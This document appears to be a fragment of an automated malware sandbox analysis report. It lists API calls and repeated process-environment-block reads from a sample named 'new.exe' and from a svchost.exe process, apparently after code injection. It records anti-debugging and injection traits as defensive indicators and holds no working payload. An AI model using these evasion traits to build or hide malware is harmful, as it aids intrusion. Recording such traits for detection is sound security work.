                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BC3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00BC3B3A
                Source: C:\Users\user\Desktop\new.exeCode function: 5_2_00BF5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_00BF5A7C
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00BC4B37 LoadLibraryA,GetProcAddress, 5_2_00BC4B37
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00F5D4F0 mov eax, dword ptr fs:[00000030h] 5_2_00F5D4F0
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00F5D490 mov eax, dword ptr fs:[00000030h] 5_2_00F5D490
                Source: C:\Users\user\Desktop\new.exe | Code function: 5_2_00F5BE20 mov eax, dword ptr fs:[00000030h] 5_2_00F5BE20
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B2349 mov eax, dword ptr fs:[00000030h] 7_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h] 7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h] 7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h] 7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B035C mov ecx, dword ptr fs:[00000030h] 7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h] 7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034B035C mov eax, dword ptr fs:[00000030h] 7_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034FA352 mov eax, dword ptr fs:[00000030h] 7_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034D8350 mov ecx, dword ptr fs:[00000030h] 7_2_034D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0350634F mov eax, dword ptr fs:[00000030h] 7_2_0350634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034D437C mov eax, dword ptr fs:[00000030h] 7_2_034D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h] 7_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h] 7_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0346A30B mov eax, dword ptr fs:[00000030h] 7_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0342C310 mov ecx, dword ptr fs:[00000030h] 7_2_0342C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03450310 mov ecx, dword ptr fs:[00000030h] 7_2_03450310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034EC3CD mov eax, dword ptr fs:[00000030h] 7_2_034EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h] 7_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h] 7_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h] 7_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034383C0 mov eax, dword ptr fs:[00000030h] 7_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h] 7_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h] 7_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034DE3DB mov ecx, dword ptr fs:[00000030h] 7_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034DE3DB mov eax, dword ptr fs:[00000030h] 7_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034D43D4 mov eax, dword ptr fs:[00000030h] 7_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034D43D4 mov eax, dword ptr fs:[00000030h] 7_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h] 7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h] 7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h] 7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h] 7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h] 7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h] 7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h] 7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034403E9 mov eax, dword ptr fs:[00000030h] 7_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 7_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_034663FF mov eax, dword ptr fs:[00000030h] 7_2_034663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h] 7_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h] 7_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0342E388 mov eax, dword ptr fs:[00000030h] 7_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0345438F mov eax, dword ptr fs:[00000030h] 7_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_0345438F mov eax, dword ptr fs:[00000030h] 7_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_03428397 mov eax, dword ptr fs:[00000030h] 7_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03428397 mov eax, dword ptr fs:[00000030h]7_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03428397 mov eax, dword ptr fs:[00000030h]7_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B8243 mov eax, dword ptr fs:[00000030h]7_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B8243 mov ecx, dword ptr fs:[00000030h]7_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0350625D mov eax, dword ptr fs:[00000030h]7_2_0350625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A250 mov eax, dword ptr fs:[00000030h]7_2_0342A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436259 mov eax, dword ptr fs:[00000030h]7_2_03436259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EA250 mov eax, dword ptr fs:[00000030h]7_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EA250 mov eax, dword ptr fs:[00000030h]7_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]7_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]7_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03434260 mov eax, dword ptr fs:[00000030h]7_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342826B mov eax, dword ptr fs:[00000030h]7_2_0342826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034E0274 mov eax, dword ptr fs:[00000030h]7_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342823B mov eax, dword ptr fs:[00000030h]7_2_0342823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343A2C3 mov eax, dword ptr fs:[00000030h]7_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_035062D6 mov eax, dword ptr fs:[00000030h]7_2_035062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]7_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]7_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402E1 mov eax, dword ptr fs:[00000030h]7_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E284 mov eax, dword ptr fs:[00000030h]7_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346E284 mov eax, dword ptr fs:[00000030h]7_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]7_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]7_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B0283 mov eax, dword ptr fs:[00000030h]7_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402A0 mov eax, dword ptr fs:[00000030h]7_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034402A0 mov eax, dword ptr fs:[00000030h]7_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov ecx, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C62A0 mov eax, dword ptr fs:[00000030h]7_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov ecx, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C4144 mov eax, dword ptr fs:[00000030h]7_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342C156 mov eax, dword ptr fs:[00000030h]7_2_0342C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C8158 mov eax, dword ptr fs:[00000030h]7_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436154 mov eax, dword ptr fs:[00000030h]7_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03436154 mov eax, dword ptr fs:[00000030h]7_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504164 mov eax, dword ptr fs:[00000030h]7_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03504164 mov eax, dword ptr fs:[00000030h]7_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov eax, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DE10E mov ecx, dword ptr fs:[00000030h]7_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA118 mov ecx, dword ptr fs:[00000030h]7_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]7_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]7_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034DA118 mov eax, dword ptr fs:[00000030h]7_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F0115 mov eax, dword ptr fs:[00000030h]7_2_034F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03460124 mov eax, dword ptr fs:[00000030h]7_2_03460124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F61C3 mov eax, dword ptr fs:[00000030h]7_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F61C3 mov eax, dword ptr fs:[00000030h]7_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034AE1D0 mov eax, dword ptr fs:[00000030h]7_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_035061E5 mov eax, dword ptr fs:[00000030h]7_2_035061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034601F8 mov eax, dword ptr fs:[00000030h]7_2_034601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03470185 mov eax, dword ptr fs:[00000030h]7_2_03470185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EC188 mov eax, dword ptr fs:[00000030h]7_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034EC188 mov eax, dword ptr fs:[00000030h]7_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D4180 mov eax, dword ptr fs:[00000030h]7_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D4180 mov eax, dword ptr fs:[00000030h]7_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]7_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]7_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]7_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B019F mov eax, dword ptr fs:[00000030h]7_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]7_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]7_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A197 mov eax, dword ptr fs:[00000030h]7_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03432050 mov eax, dword ptr fs:[00000030h]7_2_03432050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B6050 mov eax, dword ptr fs:[00000030h]7_2_034B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0345C073 mov eax, dword ptr fs:[00000030h]7_2_0345C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B4000 mov ecx, dword ptr fs:[00000030h]7_2_034B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034D2000 mov eax, dword ptr fs:[00000030h]7_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]7_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]7_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]7_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0344E016 mov eax, dword ptr fs:[00000030h]7_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A020 mov eax, dword ptr fs:[00000030h]7_2_0342A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342C020 mov eax, dword ptr fs:[00000030h]7_2_0342C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C6030 mov eax, dword ptr fs:[00000030h]7_2_034C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B20DE mov eax, dword ptr fs:[00000030h]7_2_034B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0342A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034380E9 mov eax, dword ptr fs:[00000030h]7_2_034380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B60E0 mov eax, dword ptr fs:[00000030h]7_2_034B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0342C0F0 mov eax, dword ptr fs:[00000030h]7_2_0342C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034720F0 mov ecx, dword ptr fs:[00000030h]7_2_034720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0343208A mov eax, dword ptr fs:[00000030h]7_2_0343208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034280A0 mov eax, dword ptr fs:[00000030h]7_2_034280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034C80A8 mov eax, dword ptr fs:[00000030h]7_2_034C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F60B8 mov eax, dword ptr fs:[00000030h]7_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034F60B8 mov ecx, dword ptr fs:[00000030h]7_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346674D mov esi, dword ptr fs:[00000030h]7_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346674D mov eax, dword ptr fs:[00000030h]7_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346674D mov eax, dword ptr fs:[00000030h]7_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430750 mov eax, dword ptr fs:[00000030h]7_2_03430750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034BE75D mov eax, dword ptr fs:[00000030h]7_2_034BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472750 mov eax, dword ptr fs:[00000030h]7_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03472750 mov eax, dword ptr fs:[00000030h]7_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_034B4755 mov eax, dword ptr fs:[00000030h]7_2_034B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03438770 mov eax, dword ptr fs:[00000030h]7_2_03438770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03440770 mov eax, dword ptr fs:[00000030h]7_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0346C700 mov eax, dword ptr fs:[00000030h]7_2_0346C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03430710 mov eax, dword ptr fs:[00000030h]7_2_03430710
